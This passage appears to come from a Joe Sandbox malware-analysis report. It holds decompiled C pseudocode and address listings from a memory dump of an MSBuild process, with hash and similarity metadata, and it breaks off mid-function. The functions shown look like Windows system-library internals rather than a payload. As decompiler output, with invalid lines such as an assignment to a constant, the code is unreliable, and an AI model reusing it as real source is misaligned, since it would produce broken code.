                                                                                                0x01116f13
                                                                                                0x01116f17
                                                                                                0x01116f17
                                                                                                0x01116f18
                                                                                                0x01116f1b
                                                                                                0x01116f1f
                                                                                                0x01116f23
                                                                                                0x00000000
                                                                                                0x01116f28
                                                                                                0x010d5204
                                                                                                0x010d5204
                                                                                                0x010d5208
                                                                                                0x00000000
                                                                                                0x010d5208
                                                                                                0x010d5185
                                                                                                0x010d5188
                                                                                                0x010d518a
                                                                                                0x010d518e
                                                                                                0x010d5195
                                                                                                0x01116db1
                                                                                                0x01116db5
                                                                                                0x01116db9
                                                                                                0x010d519b
                                                                                                0x010d519b
                                                                                                0x010d519e
                                                                                                0x010d51a7
                                                                                                0x010d51a9
                                                                                                0x010d51a9
                                                                                                0x010d51b5
                                                                                                0x010d51b8
                                                                                                0x010d51bb
                                                                                                0x010d51be
                                                                                                0x010d51c1
                                                                                                0x010d51c5
                                                                                                0x010d51c9
                                                                                                0x010d51cd
                                                                                                0x010d51cd
                                                                                                0x010d51d8
                                                                                                0x010d51dc
                                                                                                0x010d51e0
                                                                                                0x01116dcc
                                                                                                0x01116dd0
                                                                                                0x01116dd5
                                                                                                0x01116ddd
                                                                                                0x01116de1
                                                                                                0x01116de1
                                                                                                0x01116de5
                                                                                                0x01116deb
                                                                                                0x01116df1
                                                                                                0x01116df7
                                                                                                0x01116dfd
                                                                                                0x01116e01
                                                                                                0x01116e05
                                                                                                0x01116e09
                                                                                                0x01116e0d
                                                                                                0x01116e11
                                                                                                0x01116e11
                                                                                                0x010d51eb
                                                                                                0x01116e1a
                                                                                                0x01116e1f
                                                                                                0x01116e21
                                                                                                0x01116e23
                                                                                                0x00000000
                                                                                                0x010d51f1
                                                                                                0x010d51f1
                                                                                                0x00000000
                                                                                                0x010d51f1

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID:
                                                                                                • API String ID: 3446177414-0
                                                                                                • Opcode ID: 142e52419e2ba9e13ef3b5dc677ae6613bc862b093080c866f92b2f2ffd2376a
                                                                                                • Instruction ID: bbbc50d89b07813915920ea6dbbf393f249c099108556d0f21c145d6910eea14
                                                                                                • Opcode Fuzzy Hash: 142e52419e2ba9e13ef3b5dc677ae6613bc862b093080c866f92b2f2ffd2376a
                                                                                                • Instruction Fuzzy Hash: AEC1FF755093818FD358CF28C580A6AFBF1BB89304F184A6EF9D98B392D771E945CB42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D03E2 Relevance: 1.8, APIs: 1, Instructions: 254COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E010D03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x119d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E010D0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E010EB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E010BB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1197c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E010C7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E010C7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01127016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E010E9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E011269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1197c04 != 0) {
						_t118 = _v12;
						_t120 = E0112A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1197bd8;
						if( *0x1197bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E010E95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E010E99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01123540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E010AB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E010EAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1198474 - 3;
										if( *0x1198474 != 3) {
											 *0x11979dc =  *0x11979dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E010C7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E010C7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01127016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x1198708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x1197b00; // 0x0
							asm("ror esi, cl");
							 *0x119b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E010E95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E010B7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                0x010d03f1
                                                                                                0x010d03f7
                                                                                                0x010d03f9
                                                                                                0x010d03fb
                                                                                                0x010d03fd
                                                                                                0x010d0400
                                                                                                0x010d040a
                                                                                                0x01114c7a
                                                                                                0x010d0537
                                                                                                0x010d0547
                                                                                                0x010d0410
                                                                                                0x010d0410
                                                                                                0x010d0414
                                                                                                0x010d0417
                                                                                                0x010d041a
                                                                                                0x010d0421
                                                                                                0x010d0424
                                                                                                0x010d042b
                                                                                                0x010d043b
                                                                                                0x010d043e
                                                                                                0x010d043f
                                                                                                0x010d043f
                                                                                                0x010d0446
                                                                                                0x010d0449
                                                                                                0x010d044c
                                                                                                0x010d044f
                                                                                                0x010d0459
                                                                                                0x01114c8d
                                                                                                0x010d045f
                                                                                                0x010d045f
                                                                                                0x010d045f
                                                                                                0x010d0467
                                                                                                0x01114c97
                                                                                                0x01114c9d
                                                                                                0x01114ca4
                                                                                                0x01114caa
                                                                                                0x01114caf
                                                                                                0x01114cb1
                                                                                                0x01114cc3
                                                                                                0x01114cb3
                                                                                                0x01114cbc
                                                                                                0x01114cbc
                                                                                                0x01114cc8
                                                                                                0x01114ccb
                                                                                                0x01114cd7
                                                                                                0x01114cda
                                                                                                0x01114cdf
                                                                                                0x01114cdf
                                                                                                0x01114ccb
                                                                                                0x01114ca4
                                                                                                0x010d046d
                                                                                                0x010d046f
                                                                                                0x010d046f
                                                                                                0x010d0471
                                                                                                0x010d0476
                                                                                                0x010d047a
                                                                                                0x010d047b
                                                                                                0x010d0483
                                                                                                0x010d0489
                                                                                                0x010d048d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114ce9
                                                                                                0x01114cef
                                                                                                0x01114d22
                                                                                                0x01114d22
                                                                                                0x00000000
                                                                                                0x01114d22
                                                                                                0x01114cf1
                                                                                                0x01114cf7
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114cf9
                                                                                                0x01114cff
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d05
                                                                                                0x01114d07
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d0d
                                                                                                0x01114d0f
                                                                                                0x01114d14
                                                                                                0x01114d16
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d1c
                                                                                                0x01114d1c
                                                                                                0x010d0499
                                                                                                0x010d0535
                                                                                                0x010d0535
                                                                                                0x00000000
                                                                                                0x010d0535
                                                                                                0x010d04a6
                                                                                                0x01114d2c
                                                                                                0x01114d37
                                                                                                0x01114d39
                                                                                                0x01114d3b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d41
                                                                                                0x01114d48
                                                                                                0x010d0527
                                                                                                0x010d052b
                                                                                                0x010d052d
                                                                                                0x010d0530
                                                                                                0x010d0530
                                                                                                0x00000000
                                                                                                0x010d052b
                                                                                                0x01114d4e
                                                                                                0x010d04ac
                                                                                                0x010d04ac
                                                                                                0x010d04af
                                                                                                0x010d04b2
                                                                                                0x010d04b7
                                                                                                0x010d04b9
                                                                                                0x010d04bb
                                                                                                0x010d04bd
                                                                                                0x010d04bf
                                                                                                0x010d04c5
                                                                                                0x010d04c9
                                                                                                0x01114d53
                                                                                                0x01114d59
                                                                                                0x01114db9
                                                                                                0x01114dba
                                                                                                0x01114dbf
                                                                                                0x01114dc2
                                                                                                0x01114dc4
                                                                                                0x01114dc7
                                                                                                0x01114dce
                                                                                                0x00000000
                                                                                                0x01114dce
                                                                                                0x01114d5b
                                                                                                0x01114d61
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d63
                                                                                                0x01114d69
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114d6b
                                                                                                0x01114d6e
                                                                                                0x01114d74
                                                                                                0x01114d76
                                                                                                0x01114d7c
                                                                                                0x01114d7e
                                                                                                0x01114d84
                                                                                                0x01114d89
                                                                                                0x01114d8c
                                                                                                0x01114d8d
                                                                                                0x01114d92
                                                                                                0x01114d95
                                                                                                0x01114d96
                                                                                                0x01114d98
                                                                                                0x01114d9a
                                                                                                0x01114d9f
                                                                                                0x01114da4
                                                                                                0x01114da6
                                                                                                0x01114da8
                                                                                                0x01114daf
                                                                                                0x01114db1
                                                                                                0x01114db1
                                                                                                0x01114daf
                                                                                                0x01114da6
                                                                                                0x01114d84
                                                                                                0x01114d7c
                                                                                                0x00000000
                                                                                                0x01114d74
                                                                                                0x010d04d6
                                                                                                0x01114de1
                                                                                                0x010d04dc
                                                                                                0x010d04dc
                                                                                                0x010d04dc
                                                                                                0x010d04e4
                                                                                                0x01114deb
                                                                                                0x01114df1
                                                                                                0x01114df8
                                                                                                0x01114dfe
                                                                                                0x01114e03
                                                                                                0x01114e05
                                                                                                0x01114e17
                                                                                                0x01114e07
                                                                                                0x01114e10
                                                                                                0x01114e10
                                                                                                0x01114e1c
                                                                                                0x01114e1f
                                                                                                0x01114e35
                                                                                                0x01114e35
                                                                                                0x01114e1f
                                                                                                0x01114df8
                                                                                                0x010d04f1
                                                                                                0x010d04fa
                                                                                                0x01114e3f
                                                                                                0x01114e47
                                                                                                0x01114e5b
                                                                                                0x01114e61
                                                                                                0x01114e67
                                                                                                0x01114e69
                                                                                                0x01114e71
                                                                                                0x01114e73
                                                                                                0x010d0500
                                                                                                0x010d0500
                                                                                                0x010d0500
                                                                                                0x010d04fa
                                                                                                0x010d0508
                                                                                                0x010d051d
                                                                                                0x010d051d
                                                                                                0x010d051f
                                                                                                0x010d0524
                                                                                                0x00000000
                                                                                                0x010d0524
                                                                                                0x010d0515
                                                                                                0x010d0517
                                                                                                0x01114e7a
                                                                                                0x01114e7c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01114e85
                                                                                                0x00000000
                                                                                                0x01114e85
                                                                                                0x00000000
                                                                                                0x010d0517

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a67bb24277ef99bfe377b9ca903900590a70a347dfe050a57bef5b2e7436f5b5
                                                                                                • Instruction ID: 60f11cca91a2741ed7cfef67e2d7f220aae00b45f310201ce1597c0b06ac935d
                                                                                                • Opcode Fuzzy Hash: a67bb24277ef99bfe377b9ca903900590a70a347dfe050a57bef5b2e7436f5b5
                                                                                                • Instruction Fuzzy Hash: C1912671E003159FEF359B6CC844BAEBBE4AB01B24F050275FAA5A76D9DB749C40CB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CB944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E010CB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x119d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E010C7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01178CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E010E9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E010EB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E010ECE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E010C7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01178F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E010EAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1198628; // 0x0
								_v68 = _t77;
								_t78 =  *0x119862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1198628; // 0x0
							_t116 =  *0x119862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                0x010cb94c
                                                                                                0x010cb956
                                                                                                0x010cb95c
                                                                                                0x010cb95e
                                                                                                0x010cb964
                                                                                                0x010cb969
                                                                                                0x010cb96d
                                                                                                0x010cb96d
                                                                                                0x010cb970
                                                                                                0x010cb974
                                                                                                0x010cb97a
                                                                                                0x010cbadf
                                                                                                0x010cbadf
                                                                                                0x010cbae2
                                                                                                0x010cbae4
                                                                                                0x010cbae6
                                                                                                0x010cbaf0
                                                                                                0x01112cb8
                                                                                                0x010cbaf6
                                                                                                0x010cbaf6
                                                                                                0x010cbaf6
                                                                                                0x010cbafd
                                                                                                0x010cbb1f
                                                                                                0x010cbb1f
                                                                                                0x010cbaff
                                                                                                0x010cbb00
                                                                                                0x010cbb00
                                                                                                0x010cbb03
                                                                                                0x010cbb03
                                                                                                0x010cbacb
                                                                                                0x010cbacf
                                                                                                0x010cbad0
                                                                                                0x010cbad1
                                                                                                0x010cbadc
                                                                                                0x010cbadc
                                                                                                0x010cb980
                                                                                                0x010cb980
                                                                                                0x010cb988
                                                                                                0x010cb98b
                                                                                                0x010cb98d
                                                                                                0x010cb990
                                                                                                0x010cb993
                                                                                                0x010cb999
                                                                                                0x010cb99b
                                                                                                0x010cb9a1
                                                                                                0x010cb9a5
                                                                                                0x010cb9aa
                                                                                                0x010cb9b0
                                                                                                0x010cb9bb
                                                                                                0x010cb9c0
                                                                                                0x010cb9c3
                                                                                                0x010cb9ca
                                                                                                0x010cb9cc
                                                                                                0x010cb9cf
                                                                                                0x010cb9d3
                                                                                                0x010cb9d7
                                                                                                0x010cba94
                                                                                                0x010cba94
                                                                                                0x010cba98
                                                                                                0x010cbaa3
                                                                                                0x01112ccb
                                                                                                0x010cbaa9
                                                                                                0x010cbaa9
                                                                                                0x010cbaa9
                                                                                                0x010cbab1
                                                                                                0x01112cd5
                                                                                                0x01112cdd
                                                                                                0x01112cdd
                                                                                                0x010cbabb
                                                                                                0x010cbabc
                                                                                                0x010cbac2
                                                                                                0x010cbac3
                                                                                                0x010cbac3
                                                                                                0x010cbac6
                                                                                                0x00000000
                                                                                                0x010cb9dd
                                                                                                0x010cb9dd
                                                                                                0x010cb9e7
                                                                                                0x010cb9e7
                                                                                                0x010cb9ec
                                                                                                0x010cb9ec
                                                                                                0x010cb9f1
                                                                                                0x010cb9f5
                                                                                                0x010cb9fa
                                                                                                0x010cba00
                                                                                                0x010cba0c
                                                                                                0x010cba10
                                                                                                0x010cba10
                                                                                                0x010cba12
                                                                                                0x010cba18
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cbb26
                                                                                                0x010cbb26
                                                                                                0x010cba1e
                                                                                                0x010cba1e
                                                                                                0x010cba23
                                                                                                0x010cba25
                                                                                                0x010cba2c
                                                                                                0x010cba30
                                                                                                0x010cba35
                                                                                                0x010cba35
                                                                                                0x010cba41
                                                                                                0x010cba46
                                                                                                0x010cba4c
                                                                                                0x010cba50
                                                                                                0x010cba54
                                                                                                0x010cba6a
                                                                                                0x010cba6e
                                                                                                0x010cba70
                                                                                                0x010cba74
                                                                                                0x010cba78
                                                                                                0x010cba7a
                                                                                                0x010cba7c
                                                                                                0x010cba8e
                                                                                                0x010cba90
                                                                                                0x010cba92
                                                                                                0x010cbb14
                                                                                                0x010cbb14
                                                                                                0x010cbb16
                                                                                                0x010cbb16
                                                                                                0x00000000
                                                                                                0x010cba7c
                                                                                                0x010cbb0a
                                                                                                0x010cbb0d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cbb0f

                                                                                                APIs
                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010CB9A5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                • String ID:
                                                                                                • API String ID: 885266447-0
                                                                                                • Opcode ID: 4bb37ccc6754e912082b3ede17e0883feb601ace4e0ed1c8c0a95dce87c17ad3
                                                                                                • Instruction ID: 080871269b358b0078dd388e7b3ee47716b66832cadd29fe1424602cd65d564b
                                                                                                • Opcode Fuzzy Hash: 4bb37ccc6754e912082b3ede17e0883feb601ace4e0ed1c8c0a95dce87c17ad3
                                                                                                • Instruction Fuzzy Hash: D3511271A08341CFC724DF6DC08192EBBE5BB88A90F24896EEAD587355D771E844CF92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 78%
                                                                                                			E010AB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x117f7a8);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E010FD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E010ED000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E010EF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
